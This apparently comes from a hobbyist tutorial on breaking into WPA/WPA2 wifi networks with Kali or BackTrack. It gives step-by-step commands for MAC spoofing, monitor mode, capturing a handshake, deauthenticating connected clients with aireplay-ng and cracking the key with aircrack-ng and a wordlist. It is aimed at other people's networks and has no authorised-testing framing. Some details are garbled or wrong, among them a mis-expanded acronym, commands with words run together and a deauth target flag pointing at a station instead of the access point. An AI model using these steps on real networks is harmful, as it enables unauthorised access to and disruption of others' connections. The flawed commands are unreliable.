Hacking wifi using Backtrack or Kali linux

Those wifi networks which doesnot show WPS pin can be hacked by using Back track .But its quite complicated,not impossible.

Some requirements

1.We need to boot or install kali linux or back track.
 2.Network card is important and it should support packet injection.

Some important features or characteristics

1.MAC Address (Media Access Control Address).

2.WAP(Wireless Access Point.

3.PSK(Pre Shared Key)

4.WPA/WPA2 (Wifi Protected Access/Wifi Protected Access 2)

5.BSSID(Extended Service Set Identification)

 There are few steps to be followed

First step(1):

•  In backtrack open the terminal and give command 'ifconfig'.
•  You will see numbers of lists of all networks adapters in your system like wlanx,wlano   etc.
•   Turn off your network card using command: ifconfig wlano down (You should change   wlano to whatever it said in previous command.)
•   Give the command: macchanger-m 00:11:22:33:44:55
•   Turn the device on by giving command: ifconfig wlano up

Second step(2)
      Second step is all about creating a virtual monitoring interface.

•  Give command :airmon-ng start wlano
•  It creates a new monitor interface known as mono  

Third step(3)  
       By monitoring the wireless traffic start the attack

•   Give command : airodump-ng mono. It will list down all active AP and their BSSID       and other details . Also below the list you will see the list of computer stations               connected to any of their APs.
•   Note down the BSSID and channel it using (CH in the output) of the AP you want to     hit .
•    Hit Ctrl+C to end the monitoring .

Fourth step(4)
       Lock onto the needed AP. 
       This will target the communication from just the accespoint you want and start writing            don't collected information into a file you need to hack.

       What we are hoping to capture is the 4way handshake data that the systems use to              authenticate, this data can then be used to crack the password used.

•   Give Command : airodump-ng --bssid <bssid of AP> -c 4 -w dumpfilenamemon0

        The underlined parts need to be changed as per the data you have. dumpfilename                can be replaced with anything.     

•   This will start monitoring the Accesspoint and showing you the stations connected to   it too. You need to write down the BSSID of any one of the stations so that you can       trick it to disconnect and reconnect.

Fifth step(5)

       Capturing authentication Packets:This will only work if your network card is packet                injection compatible else you will have to wait till the the person disconnect and                      reconnects himself.

• Open new terminal and give command : 
  aireplay-ng -0 30 -a <BSSID of Station Connected> mon0
  This will send 30 disconnect requests to the computer causing it to try and reconnect to the accesspoint.
• If it shows some error or does not seem to work it is probably the issue with the network card and you will need to wait till the user reconnects by himself.
• Once the reconnection happens you can see it in the Airmon terminal which is monitoring the packets. A alert should be shown ton the top right corner.
  Hit ctrl+c and exit it. Time to crack the password.

Sixth step(6): Password cracking

• You need a password list file which can be downloaded from the internet. Just search for "wordlist" or  "password list" you can get files with millions of words and some as big as 1GB to 10Gb. More the words in it the better.
• Get and extract the word list file to your home folder.
• Run the command : 
  aircrack-ng -w wordlist.lst -b <AP BSSID>  dumpfilename*.cap
• Replace the underlined with the the right details.

Wait sometime and later you will see password on your screen. ENJOY GUYS!!!!!